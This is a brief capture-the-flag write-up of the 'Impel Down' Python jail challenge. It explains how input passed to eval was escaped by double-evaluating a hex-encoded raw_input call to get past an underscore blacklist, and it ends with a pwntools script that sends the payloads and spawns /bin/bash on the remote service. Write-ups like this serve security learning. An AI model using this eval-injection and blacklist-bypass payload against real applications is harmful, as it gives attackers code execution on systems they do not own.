Rating: 1.0

Impel Down was a python exploitation problem. Putting in random statements, I eventually got an error when putting in "digdig", when it revealed part of the source code. It was doing eval("your."+input+"()"). After trying many things, I thought of evaling multiple things at once, separated by commas, to make a tuple. My payload was "dig(),eval(eval('raw\x5finput()')),", which would all me to bypass the underscore blacklisting by using char encoding and eval'ing twice to allow execution of anything I put in. After that there were no restrictions so I used import('os').system('/bin/bash') to get shell, and run the executable to get the flag.

from pwn import *

p=remote("ch41l3ng3s.codegate.kr",2014)

p.recv()

p.sendline("aaaaaaaa"*200)

p.sendline("dig(),eval(eval('raw\x5finput()')),")

p.sendline("import('os').system('/bin/bash')")

p.interactive()